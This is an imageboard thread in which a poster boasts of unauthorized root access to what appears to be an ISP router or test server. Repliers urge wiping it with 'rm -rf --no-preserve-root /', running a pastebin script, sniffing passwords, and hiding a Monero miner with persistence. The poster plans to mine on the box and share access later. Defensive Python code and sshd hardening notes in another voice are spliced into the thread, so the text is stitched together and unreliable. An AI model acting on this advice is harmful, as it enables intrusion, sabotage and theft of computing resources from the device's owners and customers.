I am a leet hacker and owned this box on the interweb. What do Sup Forums ?
you are a child who doesn't know what to do with power.
rm -rf yourself
kill yourself
The box appears to be quite a powerful server.
Perhaps someone's PC? For the record it looks like this box is dishing up malware and trying to brute force other ssh servers on the internet. I'm going to do the world a favour when I'm through here.
sending you a script to run. stand by.
looks like a VM host or router maybe?
This is an interesting place to keep your sshd
=>
Some domains are not resolving even after adding a dns server. Interesting....
I think you are right, friend. It looks like a router for a company called CenturyLink, located in LA.
>box
off yourself
Much brute force attacking
Ping known server locs and triangulate based on that.
>no fail2ban
>no spa
Fire up webserver and host doge memes. And set up ssh, other anons want to have fun.
Run something to test performance. Chances are you're in a honeypot.
Use fortune(6) and screencap
I don't bother banning attacks, if they waste their time on me, they're losing resources to target softer targets.
I have notified the ISP.
Can we dynamic tunnel through this please?
...
post scripts
>2017
>fortune not installed
Reeee. Own the shit out of this pleb
Just start pinging a random website then just nuke the system by deleting boot loader and running the good old rm -rf --no-preserve-root /
I thought about it, however I guess they have paying customers that might rely on the router. I have notified them so hopefully they take action. If it's still a mess next week I will do the job for them (albeit not before I create an account for Sup Forums to go ape on).
Neat, that was nice of you.
Sooo many routes!
I'm a nice guy
Shall we do some packet capture Sup Forums ? | grep password?
If you don't run this, you're gay.
wget -q pastebin.com
>pastebin.com
No one calls me gay! I'll run anything and mine Litecoins for you buddy!
a bit curious to see what they say
I see very little mining happening here.
Will post a response if they reply.
Tentacleporn? That isn't gay, though.
Well, I'm getting bored. Is there anything else I should do before logging off Sup Forums? This BOX is pretty beefy with gigabit connection.... we could do something fun?
run cowsay.
I tried.
nigga please, run this:
It is an EVS system... can you help me figure out what one (based on specs etc)
Install a deluge daemon and provide connection details allowing anons to fill the filesystem with pron and Chinese cartoons.
Lol
The file system is full. It only has 13 GB.
ITT OP finds my honeypot
post .bash_history for each home folder including /root/
Shall we play a game?
You use your honeypot to hack/crack too? You are a true white hat.
Hello! What do we have here???
...
Looks interesting. Does anyone know what this is?
not VPNs. this is a PPP server on centurylink equipment.. those are pppoe clients. this is probably connected to a termination system for an ISP. the clients are home modems.
I think we have found the problem.
Thank you sir. I'm glad I didn't kill the box, they would have 1500 angry customers on their hands.
Does Terry A Davis use century link?
based on this image:
This is a testing server.. You should output the ARP table. I'd love to see it.
Modem MACs
How do I output the ARP table?
arp -a
Not much going on here.
this is good, they look like they're emulated testing devices though.
arp -a
do that on the regular bash prompt though.
Get honneypotted "hacker"
install [spoiler]cowsay[/spoiler]
...but with spoiler text
It is a regular bash prompt.
Please tell me why a honeypot would be attacking the public internet very aggressively.
this is beginning to look more and more like a honeypot, or a deeply neglected testing server. when was the last login from one of the same subnets? grep each available network from the ssh log.
It was restarted on the 29th of March.
They ran this before I logged in:
1 ifconfig
2 vi /etc/network/interfaces
3 ifdown eth0
4 ifup eth0
5 ping 8.8.8.8
6 pwd
7 /setup.sh
8 ovs-vsctl list manager
9 ovs-vsctl list manager
10 ping 72.166.59.147
11 ping 72.166.59.147
12 ovs-vsctl list manager
13 ovs-vsctl list manager
14 ifconfig
15 ifconfig | more
16 ip route
17 ping 72.159.66.147
18 ping 72.166.59.147
19 ping 8.8.8.8
20 ifdown eth0
21 ifup eth0
22 ping 72.166.59.147
23 ip route
24 traceroute 72.166.59.145
25 traceroute 8.8.8.8
26 ifconfig
27 ifdown pppoe_c0
28 ifdown pppoe_c1
29 ip route
30 ifdown pppoe_c1
31 ifconfig pppoe_c0 down
32 ifconfig pppoe_c1 down
33 ip route
34 ping 72.166.59.147
35 ifconfig
36 reboot
37 telnet localhost 2000
38 telnet localhost 2000
39 ovs-vsctl set interface pppoe0 options:ppp-debug=true
40 tail -f /var/log/syslog
41 telnet localhost 2000
42 tail -f /var/log/syslog
43 less /var/log/syslog
44 telnet localhost 2000
45 dmesg
46 pwd
47 ls
48 ls -lrt
49 dmesg
50 pwd
51 ls
52 telnet localhost 2000
53 telnet localhost 2000
54 telnet localhost 2000
55 ping 10.10.0.3
56 ifconfig
57 tail -f /var/log.syslog
58 tail -f /var/log/syslog
59 telnet localhost 2400
60 telnet localhost 2000
61 cat /etc/issue
62 screen -r
63 cat /proc/cpuinfo
64 yum
65 apt-get
66 /usr/sbin/useradd -u 0 -o -g 0 map
67 id
68 apt-get install screen
69 cat /etc/issue
70 python
71 screen -r
72 ps -x
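History entry 66 above, `/usr/sbin/useradd -u 0 -o -g 0 map`, creates a second account with UID 0 and GID 0 (the `-o` flag permits the duplicate UID), i.e. a root-equivalent login named `map`. The check a responder would want on a box like this is an added example, not code from the thread: it walks a constructed /etc/passwd (the `map` entry mirrors what that command would create) and flags every UID 0 entry other than root, and it scans history lines for useradd/usermod invocations that request UID 0 in any of the spellings the tools accept. The sample passwd contents and the last two history lines are constructed for illustration.

```python
import os
import re
import shlex

# Constructed /etc/passwd contents; the "map" line is what history entry 66
# (/usr/sbin/useradd -u 0 -o -g 0 map) would produce on a system with only root.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
sshd:x:997:997::/var/run/sshd:/bin/false
map:x:0:0::/home/map:/bin/sh
"""

# Constructed history lines: the first three are from the posted history,
# the last two are made-up variants showing the other spellings of the same trick.
SAMPLE_HISTORY = [
    "/usr/sbin/useradd -u 0 -o -g 0 map",
    "id",
    "apt-get install screen",
    "usermod -o -u 0 backup",
    "useradd --non-unique --uid=0 svc",
]


def uid0_accounts(passwd_text):
    """Return the names of every passwd entry with UID 0 other than 'root'."""
    extra = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 7:          # skip blank or malformed lines
            continue
        name, uid = fields[0], fields[2]
        if uid == "0" and name != "root":
            extra.append(name)
    return extra


def requests_uid0(cmd):
    """True if a useradd/usermod command line asks for UID 0.

    Handles '-u 0', '-u0', '--uid 0' and '--uid=0'; '-o' / '--non-unique'
    is irrelevant to the verdict because the UID request alone is the signal.
    """
    try:
        argv = shlex.split(cmd)
    except ValueError:               # unbalanced quotes in the history line
        return False
    if not argv or os.path.basename(argv[0]) not in ("useradd", "usermod"):
        return False
    for i, tok in enumerate(argv):
        if tok in ("-u", "--uid") and i + 1 < len(argv) and argv[i + 1] == "0":
            return True
        if tok.startswith("--uid=") and tok[len("--uid="):] == "0":
            return True
        if re.fullmatch(r"-u0", tok):
            return True
    return False


def suspicious_history(lines):
    """Filter a history listing down to the UID-0 account creations."""
    return [line for line in lines if requests_uid0(line)]


if __name__ == "__main__":
    print("extra UID 0 accounts:", uid0_accounts(SAMPLE_PASSWD))
    for line in suspicious_history(SAMPLE_HISTORY):
        print("backdoor account command:", line)
```

On a live system the same two functions run over `open("/etc/passwd").read()` and `~/.bash_history` for each home directory plus `/root/`; `getent passwd` output parses identically if NSS sources other than files are in play.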
To act like a spammer and gather info from them you dub dub.
good to know, but i'm talking about the auth logs. not bash logs. do the auth logs show who logged in on March 29? where did they log in from?
use it as a miner dumbo
This. Mine a CPU coin like Monero with niceness 19 and hide your process.
what am I even looking at?
A local root login followed by a bunch of brute force logins.
Mar 29 13:22:31 crystalforest sudo: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/sh .echo_tmp
Mar 29 13:22:31 crystalforest sudo: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/mkdir -p /mnt/huge
Mar 29 13:22:31 crystalforest sudo: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/mount -t hugetlbfs nodev /mnt/huge
Mar 29 13:23:35 crystalforest login[1769]: ROOT LOGIN on '/dev/tty1'
Mar 29 13:26:51 crystalforest sshd[1859]: Accepted none for root from 185.38.148.3 port 47103 ssh2
Mar 29 13:26:51 crystalforest sshd[1859]: error: connect_to google.com: unknown host (Temporary failure in name resolution)
Mar 29 14:02:07 crystalforest sshd[1900]: Connection closed by 71.174.230.11 [preauth]
Mar 29 14:02:28 crystalforest sshd[1906]: Accepted none for root from 71.174.230.11 port 57576 ssh2
Mar 29 14:05:38 crystalforest sshd[1906]: Timeout, client not responding.
Mar 29 14:31:09 crystalforest sshd[2103]: Invalid user office from 191.82.28.127
Mar 29 14:31:09 crystalforest sshd[2103]: input_userauth_request: invalid user office [preauth]
Mar 29 14:31:09 crystalforest sshd[2103]: error: Could not get shadow information for NOUSER
Mar 29 14:31:09 crystalforest sshd[2103]: Failed password for invalid user office from 191.82.28.127 port 54402 ssh2
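The telling lines in that excerpt are the two `Accepted none for root` entries: sshd logs `Accepted none` when the "none" authentication method succeeds, which only happens for an account with an empty password on a server that permits empty passwords, so root was reachable from the internet with no credential at all. The analysis the earlier post asked for (who logged in on March 29, from where, and whether any of it came from the box's own networks) is an added example and not code from the thread. It parses log lines in the same format as the posted excerpt; the sample below is constructed from those lines plus three made-up ones (two extra failures from the same brute-force source and one key-based login from 10.10.0.3, the address pinged in the history). The 10.10.0.0/24 "internal" network is an assumption for the demonstration.

```python
import re
from collections import Counter, defaultdict
from ipaddress import ip_address, ip_network

# Constructed sample in auth.log format, modelled on the excerpt posted in the thread.
# The 14:31:12, 14:31:15 and 15:01:02 lines are invented for the demonstration.
SAMPLE_LOG = """\
Mar 29 13:23:35 crystalforest login[1769]: ROOT LOGIN on '/dev/tty1'
Mar 29 13:26:51 crystalforest sshd[1859]: Accepted none for root from 185.38.148.3 port 47103 ssh2
Mar 29 14:02:07 crystalforest sshd[1900]: Connection closed by 71.174.230.11 [preauth]
Mar 29 14:02:28 crystalforest sshd[1906]: Accepted none for root from 71.174.230.11 port 57576 ssh2
Mar 29 14:31:09 crystalforest sshd[2103]: Invalid user office from 191.82.28.127
Mar 29 14:31:09 crystalforest sshd[2103]: Failed password for invalid user office from 191.82.28.127 port 54402 ssh2
Mar 29 14:31:12 crystalforest sshd[2104]: Failed password for root from 191.82.28.127 port 54410 ssh2
Mar 29 14:31:15 crystalforest sshd[2105]: Failed password for invalid user admin from 191.82.28.127 port 54418 ssh2
Mar 29 15:01:02 crystalforest sshd[2200]: Accepted publickey for root from 10.10.0.3 port 40000 ssh2
"""

ACCEPTED = re.compile(
    r"sshd\[\d+\]: Accepted (?P<method>\S+) for (?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port (?P<port>\d+)")
FAILED = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port")
LOCAL_ROOT = re.compile(r"login\[\d+\]: ROOT LOGIN on '(?P<tty>[^']+)'")


def parse_auth_log(text):
    """Split an auth.log into accepted SSH logins, failures per source IP, and console root logins."""
    accepted, failed_by_ip, local_root = [], Counter(), []
    for line in text.splitlines():
        if (m := ACCEPTED.search(line)):
            accepted.append(m.groupdict())
        elif (m := FAILED.search(line)):
            failed_by_ip[m.group("ip")] += 1
        elif (m := LOCAL_ROOT.search(line)):
            local_root.append(m.group("tty"))
    return accepted, failed_by_ip, local_root


def none_auth_logins(accepted):
    """Logins where sshd accepted the 'none' method: no password or key was checked."""
    return [a for a in accepted if a["method"] == "none"]


def brute_force_sources(failed_by_ip, threshold=3):
    """Source IPs with at least `threshold` failed password attempts."""
    return {ip: n for ip, n in failed_by_ip.items() if n >= threshold}


def logins_by_subnet(accepted, prefix=24):
    """Group accepted logins by /prefix so repeat sources stand out."""
    by_net = defaultdict(list)
    for a in accepted:
        net = ip_network(f"{a['ip']}/{prefix}", strict=False)
        by_net[str(net)].append(a["user"])
    return dict(by_net)


def split_internal_external(accepted, internal_networks):
    """Separate logins from the operator's own networks from logins off the internet."""
    nets = [ip_network(n) for n in internal_networks]
    internal, external = [], []
    for a in accepted:
        target = internal if any(ip_address(a["ip"]) in n for n in nets) else external
        target.append(a)
    return internal, external


if __name__ == "__main__":
    accepted, failed, local = parse_auth_log(SAMPLE_LOG)
    for a in none_auth_logins(accepted):
        print(f"NO-CREDENTIAL LOGIN: {a['user']} from {a['ip']}")
    print("brute-force sources:", brute_force_sources(failed))
    print("console root logins:", local)
    internal, external = split_internal_external(accepted, ["10.10.0.0/24"])
    print("internet-sourced logins:", [a["ip"] for a in external])
```

With the real file, feed `open("/var/log/auth.log").read()` (or the rotated `auth.log.1`) in place of the sample; note that timestamps in this format carry no year, so correlate with the reboot date from `last` or `uptime` before drawing timeline conclusions.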
I don't need NEAT NET BUCKS / GBP
>I hate money
root is the only user on this system
>gin followed by a bunch of brute force logins.
>Mar 29 13:22:31 crystalforest sudo: root : TTY=unkn
FBI are on their way m8
I work. I have money. neat net bucks aren't worth my time.
This is 99.9% a testing instance that's going unnoticed. Like others are saying, mine some easy cryptocoin. Not much else you can do here except pcap.. And even then, how will you transmit the massive files directly to your storage without being investigated? Not worth it unless you have a vps in some third world country.
It takes like 5 minutes to setup a miner & shapeshift = free BTC
You don't need neat net bucks? Well that's pretty neat.
Open vSwitch is using 400% CPU time
Maybe, as a user suggested, a neglected test server; this doesn't feel like a honeypot.
top - 04:28:12 up 2 days, 20:22, 1 user, load average: 5.68, 5.64, 5.68
Tasks: 174 total, 4 running, 170 sleeping, 0 stopped, 0 zombie
%Cpu0 : 0.3 us, 0.1 sy, 0.0 ni, 99.5 id, 0.0 wa, 0.0 hi, 0.1 si, 0.0 st
%Cpu1 : 80.0 us, 20.0 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu2 : 0.7 us, 0.2 sy, 0.0 ni, 99.1 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu3 : 0.8 us, 0.2 sy, 0.0 ni, 99.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu4 : 0.1 us, 0.1 sy, 0.0 ni, 99.8 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu5 : 10.7 us, 89.3 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu6 : 0.9 us, 0.4 sy, 0.0 ni, 98.6 id, 0.0 wa, 0.0 hi, 0.1 si, 0.0 st
%Cpu7 : 1.3 us, 0.4 sy, 0.0 ni, 98.2 id, 0.0 wa, 0.0 hi, 0.1 si, 0.0 st
%Cpu8 : 54.6 us, 45.4 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu9 : 0.0 us, 0.0 sy, 0.0 ni,100.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu10 : 99.9 us, 0.1 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu11 : 0.0 us, 0.0 sy, 0.0 ni,100.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu12 :100.0 us, 0.0 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu13 : 0.0 us, 0.0 sy, 0.0 ni,100.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu14 : 80.4 us, 19.6 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu15 : 0.0 us, 0.0 sy, 0.0 ni,100.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
KiB Mem : 16405664 total, 3645260 free, 10935684 used, 1824720 buff/cache
KiB Swap: 0 total, 0 free, 0 used. 5125788 avail Mem
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
1131 root 10 -10 8964524 3248 2328 R 400.2 0.0 16408:31 ovs-dpdk/ctrl
I have already notified the ISP (emailed their abuse address). I hope they take it down and clean it up.
Already been tried. Gave it my best.. OP doesn't wanna, DNS not working on server.
See:
What do you mean by DNS not working? Do cat /etc/resolv.conf
Windows PowerShell
Is not OP.
OP here: /etc/resolv.conf is empty. I did try adding the Google DNS server 8.8.8.8, however names still wouldn't resolve.
did you enter "nameserver 8.8.8.8"?
You have to put nameserver before it.
>
>>no fail2ban
>>no spa
No pubkey encryption and password based authentication on an Internet facing device tbqh senpai - they deserve to get hacked
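The posted auth log shows `Accepted none for root`, which sshd only logs when the "none" method succeeds, i.e. root has an empty password and the server permits empty passwords. The sshd_config pair below is an added example, not a file from the thread or from the device: the "weak" half is assumed, written to be consistent with what the log shows, and the "hardened" half is the configuration a practitioner would want on any internet-facing management port. Option names are those documented for OpenSSH; comments sit on their own lines because sshd rejects trailing comments after a value.

```text
# --- Weak (assumed; consistent with "Accepted none for root" in the posted log) ---
PermitRootLogin yes
PermitEmptyPasswords yes
PasswordAuthentication yes

# --- Hardened ---
# No root over SSH at all; use an unprivileged account plus sudo.
PermitRootLogin no
PermitEmptyPasswords no
# Keys only: password and keyboard-interactive prompts are turned off,
# and AuthenticationMethods makes publickey the only accepted method.
PasswordAuthentication no
ChallengeResponseAuthentication no
PubkeyAuthentication yes
AuthenticationMethods publickey
# Slow down the brute forcers that were hammering this box.
MaxAuthTries 3
LoginGraceTime 30
# Restrict management access to the operator's own accounts/network (example names).
AllowUsers netops@10.10.0.0/24
```

Validate with `sshd -t` before restarting, and keep the existing session open while you confirm a fresh key-based login works; `AllowUsers` and the 10.10.0.0/24 range are placeholders for whatever the operator actually uses.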
>68 apt-get install screen
nuke everything
I am an idiot! (I'm also a bit drunk) but yes I did forget to put nameserver before the DNS IP. Names are resolving now. Wat do?
mine bitcoin silently and maybe have persistence
root@crystalforest:/var/log# cat /etc/issue
EvS \n \l
Poky (Yocto Project Reference Distro) 2.0.1 \n \l
I'm not mining bitcoin or any other cryptocurrency, I'm not installing any software, malware or the like. I'm investigating only. I'm also willing to do some luls where possible. However I'm not going to disrupt anybody's service or destroy equipment.
>I'm not going to disrupt anybody's service or destroy equipment.
Mining on niceness 19 won't disrupt anything.
The RAM, disk and network I/O load is minimal.
OK Fine. If they haven't cleaned up the machine after 1 week (I notified the ISP today) I'll mine the shit out of some crypto and use the box like my own off site server.
You're smart, you were correct from the very beginning.
I suggest Monero (XMR)
This is what I mine on my own personal servers to earn a free pizza once a month
Only worth it if you have a flat rate on electricity of course
...
Hmmm. my wife handles all the bills, I have no idea how much we pay or if it is fixed or not. I have a HP micro server.... probably not powerful enough to mine crypto.
I only do that on my rented servers in data centers (fixed price).
It's just peanuts unless you keep the XMR and wait for rising prices.
In my case, I forgot to exchange it and it increased 20-fold.
Free money. Virtually no disk/net I/O, little RAM, and CPU doesn't matter on nice -n19
Thanks, I have rented servers too + this stupid ISP router (that is way more powerful than my rents). I guess I should just mine too. However if the ISP fixes their rooted router I will be happy - probably owned by some Chinese or Russians hacking & used to hack the rest of the world. fuck them.
Last post for today. If the ISP reply to my email I will post it here. If they don't, next week I will create a Sup Forums account and you guys can go nuts / do whatever the fuck you want. It's been fun. thanks for your input.